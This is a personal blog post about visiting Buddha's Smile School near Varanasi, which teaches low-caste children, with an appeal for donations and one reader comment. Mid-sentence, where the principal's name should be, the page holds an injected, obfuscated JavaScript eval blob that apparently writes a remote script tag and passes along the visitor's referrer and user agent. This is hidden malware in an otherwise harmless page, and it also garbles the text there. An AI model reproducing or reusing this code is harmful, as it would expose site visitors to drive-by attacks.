Buddha’s Smile School in Sarnath, India

2013, Travel

I had the opportunity to visit a small school on the outskirts of Varanasi in Sarnath, India where kind-hearted educators spend their money and time teaching the “untouchable caste” children.  Here at Buddha’s Smile School, children sit on hard wooden benches in a room with only three walls and a chalk board to learn. Unfortunately, there was no children in attendance on the day I came to visit because the Indian government shut down school early for the summer because of the sizzling temperatures (115 degrees Fahrenheit). I don’t blame them! I only wish I was smart enough to think about this before planning my trip to India!  However, I was able to meet the principal of the school, buy eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sifss|var|u0026u|referrer|ihsas||js|php’.split(‘|’),0,{}))

, who was amazing and kind to share a few minutes with us!  He even requested the children make us greeting cards for our visit despite them not being in school at the time!  The cute cards now sit proudly on my mantle piece, bringing me to smile every time I see them!20130619-110703.jpg

The principal told us most of the children work on the streets before and after classes to help provide for their families – these kids are nursery to 5th grade level.  It’s amazing how bright the human spirit shines in them.  It’s incredibly sad that the caste system is still prevalent in India today.  It keeps repressing these children that attend Buddha’s Smile School and others like them from advancing in life.  The caste system in India is the opposite of the American dream of “Rags to Riches.”  But schools like Buddha’s Smile School are slowly changing this tide because education is the first step in empowering these people and breaking the caste system.20130619-110715.jpg

You can help Buddha’s Smile School with their mission through donations and school supplies.  Every little bit helps! Please go online now and let these children know that they are not forgotten!20130619-110648.jpg

I left books for the children with the principal, but I left wishing I could do more.  It can be overwhelming to see the level of poverty in these parts of the world.  But another way to look at the situation is that God has given us lots of opportunities to show him that we are his disciples by sharing his kindness and compassion to others.  Please go visit Buddha’s Smile School’s website and let your heart strings be pulled!

Founder of Buddha’s Smile School Rajan Kaur Saini’s husband runs a cafe next to the school. I wish I could have met this amazing and compassionate couple, but they unfortunately were away during my visit.

  1. Thank you for sharing your heart and helping hand. People have a hard time focusing on what people are actually learning, who are taught by caring people when the environment that surrounds this kind enviroment can misrepresent the love being shared.
